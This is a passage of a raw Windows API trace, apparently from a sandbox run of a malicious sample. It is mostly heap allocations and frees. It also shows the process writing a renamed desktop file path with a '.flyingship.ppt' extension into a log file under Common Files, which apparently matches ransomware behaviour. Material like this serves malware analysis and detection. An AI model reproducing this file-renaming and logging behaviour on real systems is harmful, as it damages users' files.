dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.296] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.297] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698600 [0075.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.298] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x150) returned 0x6a0b20 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698600 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0c78 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0c78 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0075.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.300] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.300] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0xec, lpOverlapped=0x0) returned 1 [0075.301] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.301] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.301] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.301] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.301] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\n", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0075.301] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x57) returned 0x674c58 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\n", cchWideChar=87, lpMultiByteStr=0x674c58, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\n", lpUsedDefaultChar=0x0) returned 87 [0075.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.302] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0075.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674c58 | out: hHeap=0x650000) returned 1 [0075.302] WriteFile (in: hFile=0x140, lpBuffer=0x75b7b8*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x75b7b8*, lpNumberOfBytesWritten=0x61eef4*=0x56, lpOverlapped=0x0) returned 1 [0075.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.302] CloseHandle (hObject=0x140) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.303] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.303] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x699838 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.303] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.304] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.304] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.304] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.304] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0075.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ae68 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.305] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 